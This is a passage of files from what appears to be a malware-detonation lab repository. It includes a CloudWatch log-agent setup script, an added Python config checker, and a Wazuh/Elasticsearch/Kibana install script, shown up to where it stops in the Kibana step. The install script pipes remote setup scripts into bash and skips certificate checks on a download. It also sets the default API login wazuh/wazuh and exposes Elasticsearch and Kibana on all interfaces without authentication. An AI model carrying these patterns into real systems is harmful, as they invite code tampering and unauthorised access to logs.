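# (syslog, apache, rails) into an ERE that recognises a timestamp laid out that way.
awslogs_format_regex() {
    case "$1" in
        '%b %d %H:%M:%S')    echo '[A-Z][a-z]{2} [ 0-9][0-9] [0-9]{2}:[0-9]{2}:[0-9]{2}' ;;
        '%d/%b/%Y:%H:%M:%S') echo '[0-9]{2}/[A-Z][a-z]{2}/[0-9]{4}:[0-9]{2}:[0-9]{2}:[0-9]{2}' ;;
        '%Y-%m-%d %H:%M:%S') echo '[0-9]{4}-[0-9]{2}-[0-9]{2} [0-9]{2}:[0-9]{2}:[0-9]{2}' ;;
        *) return 1 ;;
    esac
}

# Count the sample lines (remaining arguments) that carry no timestamp matching
# the format (first argument). Such lines would not get an event time parsed from
# their text, so a non-zero result means the format or the file is wrong.
awslogs_count_unparsed() {
    fmt="$1"; shift
    regex=$(awslogs_format_regex "$fmt") || return 2
    bad=0
    for line in "$@"; do
        printf '%s\n' "$line" | grep -Eq "$regex" || bad=$((bad + 1))
    done
    echo "$bad"
}

# Constructed sample lines in the shape of /var/log/secure entries on Amazon Linux.
SAMPLE_SECURE_1='Apr 24 08:38:42 bastion sshd[1234]: Accepted publickey for ec2-user from 10.0.0.5 port 50022 ssh2'
SAMPLE_SECURE_2='Apr 24 08:39:01 bastion sudo: ec2-user : TTY=pts/0 ; PWD=/home/ec2-user ; COMMAND=/bin/systemctl status sshd'
SAMPLE_NO_STAMP='agent restarted without a timestamp prefix'

# Emit the section and report how many of the sample lines it would fail to timestamp.
awslogs_section /var/log/secure example-log-group '%b %d %H:%M:%S'
echo "unparsed: $(awslogs_count_unparsed '%b %d %H:%M:%S' "$SAMPLE_SECURE_1" "$SAMPLE_SECURE_2" "$SAMPLE_NO_STAMP")"
```

Running the check against a few real lines from the file you intend to ship is a cheap way to catch the mismatch the bootstrap script itself makes in its CentOS 7 branch, where a /var/log/bastion section is given a %Y-%m-%d %H:%M:%S format but points at /var/log/messages, whose lines carry syslog-style timestamps.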
/additionalInstallationScripts/cloudwatchAgentLogs.sh:
--------------------------------------------------------------------------------
#!/bin/bash
#this script will install the cloudwatch agent, create a cloudwatch log group for the agent to write to and start the logging

#create cloudwatch log group, IAM role, and IAM policy
#this is done in the cloudformation template

#Update your Amazon Linux instance to pick up the latest changes in the package repositories.
sudo yum update -y -q -e 0

#Install the awslogs package. This is the recommended method for installing awslogs on Amazon Linux instances.
sudo yum install awslogs -y -q -e 0

#Start the awslogs service.
sudo systemctl start awslogsd

#Run the following command to start the awslogs service at each system boot.
sudo systemctl enable awslogsd.service

#configure logging agent (written through sudo tee so the write into /etc succeeds even when the script is not run as root)
sudo tee /etc/awslogs/awslogs.conf > /dev/null << EOF
#
# ------------------------------------------
# CLOUDWATCH LOGS AGENT CONFIGURATION FILE
# ------------------------------------------
#
# --- DESCRIPTION ---
#
# NOTE: A running agent must be stopped and restarted for configuration changes to take effect.
#
# --- CLOUDWATCH LOGS DOCUMENTATION ---
# https://aws.amazon.com/documentation/cloudwatch/
#
# --- CLOUDWATCH LOGS CONSOLE ---
# --- AGENT COMMANDS ---
# To check or change the running status of the CloudWatch Logs Agent, use the following:
#
# To check running status: service awslogs status
# To stop the agent: service awslogs stop
# To start the agent: service awslogs start
# To start the agent on server startup: chkconfig awslogs on
#
# --- AGENT LOG OUTPUT ---
# You can find logs for the agent in /var/log/awslogs.log
#

# ------------------------------------------
# CONFIGURATION DETAILS
# ------------------------------------------

[general]
# Path to the CloudWatch Logs agent's state file. The agent uses this file to maintain
# client side state across its executions.
state_file = /var/lib/awslogs/agent-state

## Each log file is defined in its own section. The section name doesn't
## matter as long as it is unique within this file.
#[kern.log]
#
## Path of log file for the agent to monitor and upload.
#file = /var/log/kern.log
#
## Name of the destination log group.
#log_group_name = kern.log
#log_stream_name = {instance_id} # Defaults to ec2 instance id
#
## Format specifier for timestamp parsing. Here are some sample formats:
## Use '%b %d %H:%M:%S' for syslog (Apr 24 08:38:42)
## Use '%d/%b/%Y:%H:%M:%S' for apache log (10/Oct/2000:13:55:36)
## Use '%Y-%m-%d %H:%M:%S' for rails log (2008-09-08 11:52:54)
#datetime_format = %b %d %H:%M:%S # Specification details in the table below.
#
## A batch is buffered for buffer-duration amount of time or 32KB of log events.
## Defaults to 5000 ms and its minimum value is 5000 ms.
#buffer_duration = 5000
#
# Use 'end_of_file' to start reading from the end of the file.
# Use 'start_of_file' to start reading from the beginning of the file.
#initial_position = start_of_file
#
## Encoding of file
#encoding = utf-8 # Other supported encodings include: ascii, latin-1
#
#
#
# Following table documents the detailed datetime format specification:
# ----------------------------------------------------------------------------------------------------------------------
# Directive   Meaning                                                                          Example
# ----------------------------------------------------------------------------------------------------------------------
# %a          Weekday as locale's abbreviated name.                                            Sun, Mon, ..., Sat (en_US)
# ----------------------------------------------------------------------------------------------------------------------
# %A          Weekday as locale's full name.                                                   Sunday, Monday, ..., Saturday (en_US)
# ----------------------------------------------------------------------------------------------------------------------
# %w          Weekday as a decimal number, where 0 is Sunday and 6 is Saturday.                0, 1, ..., 6
# ----------------------------------------------------------------------------------------------------------------------
# %d          Day of the month as a zero-padded decimal number.                                01, 02, ..., 31
# ----------------------------------------------------------------------------------------------------------------------
# %b          Month as locale's abbreviated name.                                              Jan, Feb, ..., Dec (en_US)
# ----------------------------------------------------------------------------------------------------------------------
# %B          Month as locale's full name.                                                     January, February, ..., December (en_US)
# ----------------------------------------------------------------------------------------------------------------------
# %m          Month as a zero-padded decimal number.                                           01, 02, ..., 12
# ----------------------------------------------------------------------------------------------------------------------
# %y          Year without century as a zero-padded decimal number.                            00, 01, ..., 99
# ----------------------------------------------------------------------------------------------------------------------
# %Y          Year with century as a decimal number.                                           1970, 1988, 2001, 2013
# ----------------------------------------------------------------------------------------------------------------------
# %H          Hour (24-hour clock) as a zero-padded decimal number.                            00, 01, ..., 23
# ----------------------------------------------------------------------------------------------------------------------
# %I          Hour (12-hour clock) as a zero-padded decimal number.                            01, 02, ..., 12
# ----------------------------------------------------------------------------------------------------------------------
# %p          Locale's equivalent of either AM or PM.                                          AM, PM (en_US)
# ----------------------------------------------------------------------------------------------------------------------
# %M          Minute as a zero-padded decimal number.                                          00, 01, ..., 59
# ----------------------------------------------------------------------------------------------------------------------
# %S          Second as a zero-padded decimal number.                                          00, 01, ..., 59
# ----------------------------------------------------------------------------------------------------------------------
# %f          Microsecond as a decimal number, zero-padded on the left.                        000000, 000001, ..., 999999
# ----------------------------------------------------------------------------------------------------------------------
# %z          UTC offset in the form +HHMM or -HHMM (empty string if the object is naive).     (empty), +0000, -0400, +1030
# ----------------------------------------------------------------------------------------------------------------------
# %j          Day of the year as a zero-padded decimal number.                                 001, 002, ..., 365
# ----------------------------------------------------------------------------------------------------------------------
# %U          Week number of the year (Sunday as the first day of the week) as a zero padded   00, 01, ..., 53
#             decimal number. All days in a new year preceding the first Sunday are considered
#             to be in week 0.
# ----------------------------------------------------------------------------------------------------------------------
# %W          Week number of the year (Monday as the first day of the week) as a decimal number. 00, 01, ..., 53
#             All days in a new year preceding the first Monday are considered to be in week 0.
# ----------------------------------------------------------------------------------------------------------------------
# %c          Locale's appropriate date and time representation.
Tue Aug 16 21:30:00 1988 (en_US) 131 | # ---------------------------------------------------------------------------------------------------------------------- 132 | 133 | 134 | [/var/log/messages] 135 | datetime_format = %b %d %H:%M:%S 136 | file = /var/log/messages 137 | buffer_duration = 5000 138 | log_stream_name = {instance_id} 139 | initial_position = start_of_file 140 | log_group_name = detonationLab-linux 141 | 142 | [/var/log/auth.log] 143 | datetime_format = %b %d %H:%M:%S 144 | file = /var/log/auth.log 145 | buffer_duration = 5000 146 | log_stream_name = {instance_id} 147 | initial_position = start_of_file 148 | log_group_name = detonationLab-linux 149 | 150 | [/var/log/secure] 151 | datetime_format = %b %d %H:%M:%S 152 | file = /var/log/secure 153 | buffer_duration = 5000 154 | log_stream_name = {instance_id} 155 | initial_position = start_of_file 156 | log_group_name = detonationLab-linux 157 | 158 | [/var/log/boot.log] 159 | datetime_format = %b %d %H:%M:%S 160 | file = /var/log/boot.log 161 | buffer_duration = 5000 162 | log_stream_name = {instance_id} 163 | initial_position = start_of_file 164 | log_group_name = detonationLab-linux 165 | 166 | [/var/log/dmesg] 167 | datetime_format = %b %d %H:%M:%S 168 | file = /var/log/dmesg 169 | buffer_duration = 5000 170 | log_stream_name = {instance_id} 171 | initial_position = start_of_file 172 | log_group_name = detonationLab-linux 173 | 174 | [/var/log/kern.log] 175 | datetime_format = %b %d %H:%M:%S 176 | file = /var/log/kern.log 177 | buffer_duration = 5000 178 | log_stream_name = {instance_id} 179 | initial_position = start_of_file 180 | log_group_name = detonationLab-linux 181 | 182 | [/var/log/faillog] 183 | datetime_format = %b %d %H:%M:%S 184 | file = /var/log/faillog 185 | buffer_duration = 5000 186 | log_stream_name = {instance_id} 187 | initial_position = start_of_file 188 | log_group_name = detonationLab-linux 189 | 190 | [/var/log/cron] 191 | datetime_format = %b %d %H:%M:%S 192 | file = 
/var/log/cron 193 | buffer_duration = 5000 194 | log_stream_name = {instance_id} 195 | initial_position = start_of_file 196 | log_group_name = detonationLab-linux 197 | 198 | [/var/log/yum.log] 199 | datetime_format = %b %d %H:%M:%S 200 | file = /var/log/yum.log 201 | buffer_duration = 5000 202 | log_stream_name = {instance_id} 203 | initial_position = start_of_file 204 | log_group_name = detonationLab-linux 205 | 206 | [/var/log/maillog] 207 | datetime_format = %b %d %H:%M:%S 208 | file = /var/log/maillog 209 | buffer_duration = 5000 210 | log_stream_name = {instance_id} 211 | initial_position = start_of_file 212 | log_group_name = detonationLab-linux 213 | 214 | [/var/log/mail.log] 215 | datetime_format = %b %d %H:%M:%S 216 | file = /var/log/mail.log 217 | buffer_duration = 5000 218 | log_stream_name = {instance_id} 219 | initial_position = start_of_file 220 | log_group_name = detonationLab-linux 221 | 222 | [/var/log/httpd] 223 | datetime_format = %b %d %H:%M:%S 224 | file = /var/log/httpd 225 | buffer_duration = 5000 226 | log_stream_name = {instance_id} 227 | initial_position = start_of_file 228 | log_group_name = detonationLab-linux 229 | 230 | [/var/log/mysqld.log] 231 | datetime_format = %b %d %H:%M:%S 232 | file = /var/log/mysqld.log 233 | buffer_duration = 5000 234 | log_stream_name = {instance_id} 235 | initial_position = start_of_file 236 | log_group_name = detonationLab-linux 237 | 238 | [/var/log/mysql.log] 239 | datetime_format = %b %d %H:%M:%S 240 | file = /var/log/mysql.log 241 | buffer_duration = 5000 242 | log_stream_name = {instance_id} 243 | initial_position = start_of_file 244 | log_group_name = detonationLab-linux 245 | 246 | [/var/log/btmp] 247 | datetime_format = %b %d %H:%M:%S 248 | file = /var/log/btmp 249 | buffer_duration = 5000 250 | log_stream_name = {instance_id} 251 | initial_position = start_of_file 252 | log_group_name = detonationLab-linux 253 | 254 | [/var/log/auth.log] 255 | datetime_format = %b %d %H:%M:%S 256 | file = 
/var/log/auth.log 257 | buffer_duration = 5000 258 | log_stream_name = {instance_id} 259 | initial_position = start_of_file 260 | log_group_name = detonationLab-linux 261 | 262 | [/var/log/daemon.log] 263 | datetime_format = %b %d %H:%M:%S 264 | file = /var/log/daemon.log 265 | buffer_duration = 5000 266 | log_stream_name = {instance_id} 267 | initial_position = start_of_file 268 | log_group_name = detonationLab-linux 269 | 270 | [/var/log/lastlog] 271 | datetime_format = %b %d %H:%M:%S 272 | file = /var/log/lastlog 273 | buffer_duration = 5000 274 | log_stream_name = {instance_id} 275 | initial_position = start_of_file 276 | log_group_name = detonationLab-linux 277 | 278 | [/var/log/user.log] 279 | datetime_format = %b %d %H:%M:%S 280 | file = /var/log/user.log 281 | buffer_duration = 5000 282 | log_stream_name = {instance_id} 283 | initial_position = start_of_file 284 | log_group_name = detonationLab-linux 285 | 286 | [/var/log/wtmp] 287 | datetime_format = %b %d %H:%M:%S 288 | file = /var/log/wtmp 289 | buffer_duration = 5000 290 | log_stream_name = {instance_id} 291 | initial_position = start_of_file 292 | log_group_name = detonationLab-linux 293 | 294 | [/var/log/utmp] 295 | datetime_format = %b %d %H:%M:%S 296 | file = /var/log/utmp 297 | buffer_duration = 5000 298 | log_stream_name = {instance_id} 299 | initial_position = start_of_file 300 | log_group_name = detonationLab-linux 301 | 302 | [/var/log/audit] 303 | datetime_format = %b %d %H:%M:%S 304 | file = /var/log/audit 305 | buffer_duration = 5000 306 | log_stream_name = {instance_id} 307 | initial_position = start_of_file 308 | log_group_name = detonationLab-linux 309 | 310 | [/var/log/sssd] 311 | datetime_format = %b %d %H:%M:%S 312 | file = /var/log/sssd 313 | buffer_duration = 5000 314 | log_stream_name = {instance_id} 315 | initial_position = start_of_file 316 | log_group_name = detonationLab-linux 317 | EOF 318 | 319 | 320 | #restart cloudwatch agent 321 | sudo systemctl restart awslogsd 
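The awslogs.conf written above is plain INI, so it can be reviewed offline before it ships anything. The following script is an added check, not part of the AWSDetonationLab repository: it reads a constructed excerpt of that config with configparser and reports the things a reviewer looks for here, a duplicated section name, a directory used as file=, a binary utmp-family file, a datetime_format that does not parse a syslog timestamp or carries no year, and several sections landing in the same group/stream so the source file is lost. The is_dir predicate is injected (a stub in the test) so the check runs on any workstation.

```python
"""Offline check of an awslogs.conf such as the one written above.
Added example, not code from the AWSDetonationLab repository; the agent reads
an INI file, so configparser can inspect it without the agent."""
import configparser
import re
from datetime import datetime

# Constructed excerpt of the generated config. It keeps the duplicated
# [/var/log/auth.log] section, a directory used as file= and a binary
# utmp-family file so that every check below has something to report.
SAMPLE_CONF = """\
[general]
state_file = /var/lib/awslogs/agent-state

[/var/log/auth.log]
datetime_format = %b %d %H:%M:%S
file = /var/log/auth.log
log_stream_name = {instance_id}
log_group_name = detonationLab-linux

[/var/log/httpd]
datetime_format = %b %d %H:%M:%S
file = /var/log/httpd
log_stream_name = {instance_id}
log_group_name = detonationLab-linux

[/var/log/wtmp]
datetime_format = %b %d %H:%M:%S
file = /var/log/wtmp
log_stream_name = {instance_id}
log_group_name = detonationLab-linux

[/var/log/auth.log]
datetime_format = %b %d %H:%M:%S
file = /var/log/auth.log
log_stream_name = {instance_id}
log_group_name = detonationLab-linux
"""

# utmp-style files hold binary records; the agent would ship them as garbage.
BINARY_LOGS = {"/var/log/wtmp", "/var/log/btmp", "/var/log/utmp",
               "/var/log/lastlog", "/var/log/faillog"}
# A timestamp in the syslog layout that every section above declares.
SYSLOG_SAMPLE = "Apr 24 08:38:42"


def duplicate_sections(text):
    """Section names that occur more than once, in order of first repeat."""
    seen, dups = set(), []
    for line in text.splitlines():
        m = re.match(r"^\[(.+)\]$", line.strip())
        if m:
            name = m.group(1)
            if name in seen and name not in dups:
                dups.append(name)
            seen.add(name)
    return dups


def check_awslogs_conf(text, is_dir, sample_ts=SYSLOG_SAMPLE):
    """Return a list of findings. is_dir(path) -> bool is injected so the
    check can run on a workstation against a config meant for another host."""
    findings = [f"duplicate section [{s}]" for s in duplicate_sections(text)]
    # strict=False tolerates the duplicate so the other checks still run;
    # interpolation=None is needed because '%b' would otherwise be read as an
    # interpolation sequence and read_string() would raise.
    cp = configparser.ConfigParser(strict=False, interpolation=None)
    cp.read_string(text)
    streams, no_year = {}, set()
    for section in cp.sections():
        if section == "general":
            continue
        path = cp.get(section, "file", fallback="")
        if "*" not in path and is_dir(path):
            findings.append(f"[{section}] file={path} is a directory; use a glob such as {path}/*")
        if path in BINARY_LOGS:
            findings.append(f"[{section}] file={path} is a binary utmp-family file, not a text log")
        fmt = cp.get(section, "datetime_format", fallback="")
        if fmt:
            try:
                datetime.strptime(sample_ts, fmt)
            except ValueError:
                findings.append(f"[{section}] datetime_format {fmt!r} does not parse {sample_ts!r}")
            if "%Y" not in fmt and "%y" not in fmt:
                no_year.add(fmt)
        key = (cp.get(section, "log_group_name", fallback=""), cp.get(section, "log_stream_name", fallback=""))
        streams.setdefault(key, []).append(section)
    for fmt in sorted(no_year):
        findings.append(f"datetime_format {fmt!r} has no year directive; the year must be inferred, so events near a year boundary can be misdated")
    for (group, stream), sections in streams.items():
        if len(sections) > 1:
            findings.append(f"{len(sections)} sections share group {group!r} stream {stream!r}; the source file is not recoverable in CloudWatch")
    return findings
```

Run it against the real /etc/awslogs/awslogs.conf with `is_dir=os.path.isdir` on the instance itself; the stub predicate is only there so the constructed sample runs anywhere.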
--------------------------------------------------------------------------------
/additionalInstallationScripts/installWazuh.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# install wazuh server
# Wazuh documentation - https://documentation.wazuh.com/current/installation-guide/installing-wazuh-server/index.html
#######################################

# Versions to install
ELASTIC_VERSION=6.6.1
WAZUH_VERSION=3.8
WAZUH_PATCH=$WAZUH_VERSION.2
WAZUH_PACKAGE=$WAZUH_PATCH-1
WAZUH_MANAGER_PKG="wazuh-manager"
WAZUH_API_PKG="wazuh-api"
ELASTIC_PKG="elasticsearch"
LOGSTASH_PKG="logstash"
KIBANA_PKG="kibana"

# Configuration variables
PKG_MANAGER=""
PKG_INSTALL=""
PKG_OPTIONS=""
OS_FAMILY=""
REPO_FILE=""
ELASTIC_REPO_FILE=""

set_global_parameters() {
    if command -v apt-get > /dev/null 2>&1 ; then
        PKG_MANAGER="apt-get"
        PKG_OPTIONS="-y"
        OS_FAMILY="Debian"
        REPO_FILE="/etc/apt/sources.list.d/wazuh.list"
        ELASTIC_REPO_FILE="/etc/apt/sources.list.d/elastic-6.x.list"
        WAZUH_MANAGER_PKG="${WAZUH_MANAGER_PKG}=${WAZUH_PACKAGE}"
        WAZUH_API_PKG="${WAZUH_API_PKG}=${WAZUH_PACKAGE}"
        ELASTIC_PKG="${ELASTIC_PKG}=${ELASTIC_VERSION}"
        LOGSTASH_PKG="${LOGSTASH_PKG}=1:${ELASTIC_VERSION}-1"
        KIBANA_PKG="${KIBANA_PKG}=${ELASTIC_VERSION}"

    elif command -v yum > /dev/null 2>&1 ; then
        PKG_MANAGER="yum"
        PKG_OPTIONS="-y -q -e 0"
        OS_FAMILY="RHEL"
        REPO_FILE="/etc/yum.repos.d/wazuh.repo"
        ELASTIC_REPO_FILE="/etc/yum.repos.d/elastic.repo"
        WAZUH_MANAGER_PKG="${WAZUH_MANAGER_PKG}-${WAZUH_PACKAGE}"
        WAZUH_API_PKG="${WAZUH_API_PKG}-${WAZUH_PACKAGE}"
        ELASTIC_PKG="${ELASTIC_PKG}-${ELASTIC_VERSION}"
        LOGSTASH_PKG="${LOGSTASH_PKG}-${ELASTIC_VERSION}"
        KIBANA_PKG="${KIBANA_PKG}-${ELASTIC_VERSION}"
    elif command -v zypper > /dev/null 2>&1 ; then
        PKG_MANAGER="zypper"
        PKG_OPTIONS="-y -l"
        OS_FAMILY="SUSE"
        REPO_FILE="/etc/zypp/repos.d/wazuh.repo"
        ELASTIC_REPO_FILE="/etc/zypp/repos.d/elastic.repo"
        WAZUH_MANAGER_PKG="${WAZUH_MANAGER_PKG}-${WAZUH_PACKAGE}"
        WAZUH_API_PKG="${WAZUH_API_PKG}-${WAZUH_PACKAGE}"
        ELASTIC_PKG="${ELASTIC_PKG}-${ELASTIC_VERSION}"
        LOGSTASH_PKG="${LOGSTASH_PKG}-${ELASTIC_VERSION}"
        KIBANA_PKG="${KIBANA_PKG}-${ELASTIC_VERSION}"
    fi

    PKG_INSTALL="${PKG_MANAGER} install"

    return 0
}

install_dependencies() {
    ## RHEL/CentOS/Fedora/Amazon/SUSE based OS
    if [ "${OS_FAMILY}" == "RHEL" ] || [ "${OS_FAMILY}" == "SUSE" ]; then
        ${PKG_INSTALL} ${PKG_OPTIONS} openssl wget python-pip
    ## Debian/Ubuntu based OS
    else
        ${PKG_MANAGER} update
        ${PKG_INSTALL} ${PKG_OPTIONS} curl apt-transport-https lsb-release \
            openssl software-properties-common dirmngr python-pip
    fi
    pip install boto3 requests
}

add_nodejs_repository() {
    if [ "${OS_FAMILY}" == "RHEL" ]; then
        curl --silent --location https://rpm.nodesource.com/setup_8.x | bash -
    elif [ "${OS_FAMILY}" == "SUSE" ]; then
        ${PKG_MANAGER} addrepo http://download.opensuse.org/distribution/leap/15.0/repo/oss/ node8
        ${PKG_MANAGER} --gpg-auto-import-keys refresh
    else
        curl -sL https://deb.nodesource.com/setup_8.x | bash -
    fi
}

add_wazuh_repository() {
    # Add Wazuh Repository
    ## RHEL/CentOS/Fedora/Amazon/SUSE based OS
    if [ "${OS_FAMILY}" == "RHEL" ] || [ "${OS_FAMILY}" == "SUSE" ]; then
        rpm --import https://packages.wazuh.com/key/GPG-KEY-WAZUH
        echo -ne "[wazuh_repo]\ngpgcheck=1\ngpgkey=https://packages.wazuh.com/key/GPG-KEY-WAZUH\nenabled=1\nname=Wazuh repository\nbaseurl=https://packages.wazuh.com/3.x/yum/\nprotect=1" > ${REPO_FILE}

    ## Debian/Ubuntu based OS
    else
        curl -s https://packages.wazuh.com/key/GPG-KEY-WAZUH | apt-key add -
        echo "deb https://packages.wazuh.com/3.x/apt/ stable main" | tee -a ${REPO_FILE}
        ${PKG_MANAGER} update
    fi
}

install_wazuh() {
    # Install the Wazuh Manager and enable integrator module
    ${PKG_INSTALL} ${PKG_OPTIONS} ${WAZUH_MANAGER_PKG}
    # The auth module only needs to be enabled in
    # versions prior to v3.8.0
    if [[ ${WAZUH_VERSION} < "3.8" ]]; then
        /var/ossec/bin/ossec-control enable auth
    fi
    /var/ossec/bin/ossec-control enable integrator

    # Restart the Wazuh Manager
    ## Check for systemd
    if command -v systemctl >/dev/null; then
        systemctl restart wazuh-manager > /dev/null 2>&1
    ## Check for SysV
    elif command -v service >/dev/null; then
        service wazuh-manager restart > /dev/null 2>&1
    ## Check for upstart
    elif command -v update-rc.d >/dev/null; then
        ## RHEL based OS keeps the init script under /etc/rc.d/init.d;
        ## call the script at the path that was actually found
        if [ -f /etc/rc.d/init.d/wazuh-manager ]; then
            /etc/rc.d/init.d/wazuh-manager restart > /dev/null 2>&1
        ## SUSE keeps it under /etc/init.d
        elif [ -f /etc/init.d/wazuh-manager ]; then
            /etc/init.d/wazuh-manager restart > /dev/null 2>&1
        fi
    fi

    # Install NodeJS and Wazuh API
    ${PKG_INSTALL} ${PKG_OPTIONS} nodejs
    ${PKG_INSTALL} ${PKG_OPTIONS} ${WAZUH_API_PKG}
}

add_aws_config() {
    # insert_access_key / insert_secret_key are placeholders: replace them with the
    # keys of a read-only IAM user scoped to the log buckets before running this,
    # or omit them so the wodle (a boto3 script) uses the instance profile instead.
    # These values end up in ossec.conf, which is root-readable only; keep it that way.
    cat >> /var/ossec/etc/ossec.conf <<\EOF


no
10m
yes
yes

cloudtraillogging
insert_access_key
insert_secret_key


guarddutylogging
firehose
insert_access_key
insert_secret_key


iamlogging
firehose
insert_access_key
insert_secret_key


insert_access_key
insert_secret_key


macielogging
firehose
insert_access_key
insert_secret_key


vpcflowlogging
insert_access_key
insert_secret_key



EOF
}

add_custom_rules() {
    # These rules silence the VirusTotal alerts for files that are not malware
    # (no record in the VirusTotal database, or a record with zero positives)
    cat >> /var/ossec/etc/rules/local_rules.xml << \EOF


87100
0
VirusTotal: Alert - No records in VirusTotal database



87100
1
0
VirusTotal: Alert - $(virustotal.source.file) - No positives found


EOF
}

setup_agent_fim() {
    # Configure real time monitoring in:
    # - home directories under linux agents
    # - desktop, documents, downloads, startup programs and userdata under windows agents
    cat > /var/ossec/etc/shared/default/agent.conf << \EOF


/home




C:\Users\Administrator\Desktop
C:\Users\Administrator\Downloads
C:\Users\Administrator\Documents
%APPDATA%


EOF
}

setup_wazuh_api() {
    # Creates the API user "wazuh" with password "wazuh" (the lab default); change it
    # in a real deployment, since the same credentials are stored in the Kibana app below
    cd /var/ossec/api/configuration/auth
    node htpasswd -b -c user wazuh wazuh
    # Restart the Wazuh API
    ## Check for systemd
    if command -v systemctl >/dev/null; then
        systemctl restart wazuh-api > /dev/null 2>&1
    ## Check for SysV
    elif command -v service >/dev/null; then
        service wazuh-api restart > /dev/null 2>&1
    ## Check for upstart
    elif command -v update-rc.d >/dev/null; then
        ## RHEL based OS keeps the init script under /etc/rc.d/init.d;
        ## call the script at the path that was actually found
        if [ -f /etc/rc.d/init.d/wazuh-api ]; then
            /etc/rc.d/init.d/wazuh-api restart > /dev/null 2>&1
        ## SUSE keeps it under /etc/init.d
        elif [ -f /etc/init.d/wazuh-api ]; then
            /etc/init.d/wazuh-api restart > /dev/null 2>&1
        fi
    fi
}

add_custom_config() {
    add_aws_config
    add_custom_rules
    setup_agent_fim
}

install_java() {
    ## RHEL/CentOS/Fedora based OS
    if [ "${OS_FAMILY}" == "RHEL" ] || [ "${OS_FAMILY}" == "SUSE" ]; then
        ## install Oracle Java JRE 8
        wget --no-check-certificate -c --header "Cookie: oraclelicense=accept-securebackup-cookie" http://javadl.oracle.com/webapps/download/AutoDL?BundleId=235716_2787e4a523244c269598db4e85c51e0c -O jre-8u191-linux-x64.rpm

        ## install the RPM package using yum
        ${PKG_INSTALL} ${PKG_OPTIONS} jre-8u191-linux-x64.rpm
    else
        ${PKG_MANAGER} update
        ${PKG_INSTALL} ${PKG_OPTIONS} openjdk-8-jre
    fi
}

add_elastic_repository() {
    ## RHEL/CentOS/Fedora based OS
    if [ "${OS_FAMILY}" == "RHEL" ] || [ "${OS_FAMILY}" == "SUSE" ]; then
        ## Install the Elastic repository and its GPG key
        rpm --import https://packages.elastic.co/GPG-KEY-elasticsearch
        echo -ne "[elasticsearch-6.x]\nname=Elasticsearch repository for 6.x packages\nbaseurl=https://artifacts.elastic.co/packages/6.x/yum\ngpgcheck=1\ngpgkey=https://artifacts.elastic.co/GPG-KEY-elasticsearch\nenabled=1\nautorefresh=1\ntype=rpm-md" > ${ELASTIC_REPO_FILE}

    ## Debian/Ubuntu based OS
    else
        curl -s https://artifacts.elastic.co/GPG-KEY-elasticsearch | apt-key add -
        echo "deb https://artifacts.elastic.co/packages/6.x/apt stable main" | tee -a ${ELASTIC_REPO_FILE}
        ${PKG_MANAGER} update
    fi
}

wait_elastic_component() {
    # Re-run the given command every 5 seconds until it exits 0
    query="$@"
    until ${query}; do
        >&2 echo "Elastic component is unavailable - sleeping for 5 seconds"
        sleep 5
    done
    >&2 echo "Elastic component is up - executing commands"
}

install_elastic() {
    # Install elasticsearch package and enable its service
    ${PKG_INSTALL} ${PKG_OPTIONS} ${ELASTIC_PKG}
    # Set up network.host value in elasticsearch configuration file.
    # This binds Elasticsearch on every interface and nothing in this script enables
    # authentication, so port 9200 must be restricted to the lab hosts by the security group.
    sed -i 's/#network.host: 192.168.0.1/network.host: 0.0.0.0/' /etc/elasticsearch/elasticsearch.yml
    # Enable and start Elasticsearch service
    ## Check for systemd
    if command -v systemctl >/dev/null; then
        systemctl daemon-reload > /dev/null 2>&1
        systemctl enable elasticsearch.service > /dev/null 2>&1
        systemctl start elasticsearch.service > /dev/null 2>&1
    ## Check for SysV
    elif command -v service >/dev/null; then
        chkconfig --add elasticsearch > /dev/null 2>&1
        chkconfig elasticsearch on > /dev/null 2>&1
        service elasticsearch start > /dev/null 2>&1
    fi

    # Wait until elasticsearch comes up before continuing
    ES_URL=${ES_URL:-'http://localhost:9200'}
    ES_USER=${ES_USER:-kibana}
    ES_PASSWORD=${ES_PASSWORD:-changeme}
    ES_QUERY="curl -u ${ES_USER}:${ES_PASSWORD} -XGET ${ES_URL}"
    wait_elastic_component ${ES_QUERY}
    # Load the Wazuh template for Elasticsearch
    curl https://raw.githubusercontent.com/wazuh/wazuh/$WAZUH_VERSION/extensions/elasticsearch/wazuh-elastic6-template-alerts.json | curl -XPUT 'http://localhost:9200/_template/wazuh' -H 'Content-Type: application/json' -d @-
}

install_logstash() {
    ${PKG_INSTALL} ${PKG_OPTIONS} ${LOGSTASH_PKG}

    ## Download the Wazuh configuration file for Logstash
    ## Local configuration (only in a single-host architecture)
    curl -so /etc/logstash/conf.d/01-wazuh.conf https://raw.githubusercontent.com/wazuh/wazuh/$WAZUH_VERSION/extensions/logstash/01-wazuh-local.conf

    ## Because the Logstash user needs to read the alerts.json file, add it to the OSSEC group
    usermod -a -G ossec logstash

    # Enable and start Logstash service
    ## Check for systemd
    if command -v systemctl >/dev/null; then
        systemctl daemon-reload > /dev/null 2>&1
        systemctl enable logstash.service > /dev/null 2>&1
        systemctl start logstash.service > /dev/null 2>&1
    ## Check for SysV
    elif command -v service >/dev/null; then
        ## The next steps are needed on CentOS-6/RHEL-6 or Amazon AMI (logstash uses Upstart as a service manager and needs to be fixed, see this bug):
        ## Edit the file /etc/logstash/startup.options changing line 30 from LS_GROUP=logstash to LS_GROUP=ossec.
        sed -i 's/LS_GROUP=logstash/LS_GROUP=ossec/' /etc/logstash/startup.options
        ## Update the service with the new parameters by running the command /usr/share/logstash/bin/system-install
        /usr/share/logstash/bin/system-install
        ## Force install a SysV init script by running: /usr/share/logstash/bin/system-install /etc/logstash/startup.options sysv as root
        /usr/share/logstash/bin/system-install /etc/logstash/startup.options sysv
        ## Enable and start Logstash
        chkconfig --add logstash > /dev/null 2>&1
        chkconfig logstash on > /dev/null 2>&1
        service logstash start > /dev/null 2>&1
    fi
}

install_kibana() {
    # install Kibana
    ${PKG_INSTALL} ${PKG_OPTIONS} ${KIBANA_PKG}

    ## Install the Wazuh App plugin for Kibana
    sudo -u kibana NODE_OPTIONS="--max-old-space-size=3072" /usr/share/kibana/bin/kibana-plugin install https://packages.wazuh.com/wazuhapp/wazuhapp-$(echo $WAZUH_PATCH)_$(echo $ELASTIC_VERSION).zip

    ## Kibana only listens on the loopback interface (localhost) by default. To make Kibana listen on all interfaces,
    ## edit the file /etc/kibana/kibana.yml, uncommenting the setting server.host and changing the value to 0.0.0.0.
    ## As with Elasticsearch, no authentication is configured, so port 5601 must be reachable only through the bastion.
    sed -i 's/#server.host: "localhost"/server.host: "0.0.0.0"/' /etc/kibana/kibana.yml

    # Enable and start Kibana service
    ## Check for systemd
